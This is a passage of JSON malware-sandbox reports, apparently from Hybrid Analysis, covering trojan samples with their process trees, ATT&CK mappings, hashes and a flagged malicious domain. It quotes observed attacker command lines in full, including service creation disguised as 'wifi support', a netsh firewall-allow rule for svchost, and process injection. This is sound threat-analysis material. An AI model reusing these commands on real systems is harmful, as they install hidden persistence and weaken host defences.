\"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"evryposw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FBJTAUWA\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\evryposw.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\evryposw.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has section name .text with entropy \"6.630102803682182\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has section name .text with entropy \"7.972855291312212\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has section name .reloc with entropy \"6.221496050028631\"\n \"evryposw.exe\" has section name .text with entropy \"6.630102803682182\"\n \"evryposw.exe\" has section name .text with entropy \"7.972855291312212\"\n \"evryposw.exe\" has section name .reloc with entropy \"6.221496050028631\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00004600)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (UID: 00000000-00004600)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00002140)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\evryposw.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00003340)\n Spawned process \"sc.exe\" with commandline \"create fbjtauwa binPath= \"%WINDIR%\\\\system32\\\\fbjtauwa\\\\evryposw.exe /d\\\\\"C:\\\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00002920)\n Spawned process \"sc.exe\" with commandline \"description fbjtauwa \"wifi internet conection\"\" (UID: 00000000-00002876)\n Spawned process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004864)\n Spawned process \"evryposw.exe\" with commandline \"/d\"C:\\\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\"\" (UID: 00000000-00004152)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004612)\n Spawned process \"svchost.exe\" (UID: 00000000-00004740)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 300)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 300)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 300)\n \"evryposw.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"evryposw.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"evryposw.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"evryposw.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"evryposw.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"evryposw.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:443", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004864)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004612)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d
https://hybrid-analysis.com/sample/25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d
Hybrid Analysis - Um_unhooking
{"size": 13827584, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d", "sha256": "25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d", "av_detect": 83, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 9, "total_signatures": 240, "extracted_files": [{"name": "ulhofeim.exe", "file_path": "%TEMP%\\ulhofeim.exe", "file_size": 5242368, "sha256": "37de7ebe0710529537241cde057adf4967329f4b03ed6aa37c8ef346902d7464", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe (PID: 2544)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "ulhofeim.exe.67EE49C3.bin", "file_size": 10907136, "sha256": "4e487b214daa03be7f10cdb007dac7dd0c62fd1e8b4ab3a135d33918d35b6655", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "ULHOFEIM.EXE.67EE49C4.bin", "file_size": 10907136, "sha256": "4e487b214daa03be7f10cdb007dac7dd0c62fd1e8b4ab3a135d33918d35b6655", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00002544", "name": "25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe", "normalized_path": "C:\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe", "sha256": "25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d", "av_label": "Trojan.BrsecmonE", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00003068", "parentuid": "00000000-00002544", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\njrbicei\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004276", "parentuid": "00000000-00002544", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\ulhofeim.exe\" %WINDIR%\\system32\\njrbicei\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003996", "parentuid": "00000000-00002544", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create njrbicei binPath= \"%WINDIR%\\system32\\njrbicei\\ulhofeim.exe /d\\\"C:\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002188", "parentuid": "00000000-00002544", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description njrbicei \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002912", "parentuid": "00000000-00002544", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start njrbicei", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002340", "parentuid": "00000000-00002544", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00002944", "name": "ulhofeim.exe", "normalized_path": "%WINDIR%\\system32\\njrbicei\\ulhofeim.exe", "command_line": "/d\"C:\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\"", "sha256": "4e487b214daa03be7f10cdb007dac7dd0c62fd1e8b4ab3a135d33918d35b6655"}, {"uid": "00000000-00002972", "parentuid": "00000000-00002944", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", 